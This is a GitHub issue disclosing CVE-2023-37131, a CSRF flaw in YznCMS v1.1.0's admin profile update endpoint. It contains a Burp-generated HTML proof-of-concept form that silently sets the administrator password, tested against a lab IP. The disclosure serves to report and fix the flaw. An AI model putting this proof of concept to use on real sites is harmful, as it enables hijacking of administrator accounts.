Headline
CVE-2023-37131: YznCMS v1.1.0 has a CSRF vulnerability that can be used to change administrator passwords · Issue #2 · ken678/yzncms
A Cross-Site Request Forgery (CSRF) in the component /public/admin/profile/update.html of YznCMS v1.1.0 allows attackers to arbitrarily change the Administrator password via a crafted POST request.
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Open
SHfen9 opened this issue
Jun 27, 2023
· 0 comments
Comments
YznCMS v1.1.0 has a CSRF vulnerability that can be used to change admin passwords
A bug was found. CSRF vulnerability exists.
Administrator change password module exists csrf, administrator just click the following html to change the admin password
CSRF_POC
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.64.148/yzncms-master/public/admin/profile/update.html" method="POST">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="email" value="admin@admin.com" />
<input type="hidden" name="nickname" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
The admin password is successfully changed
1 participant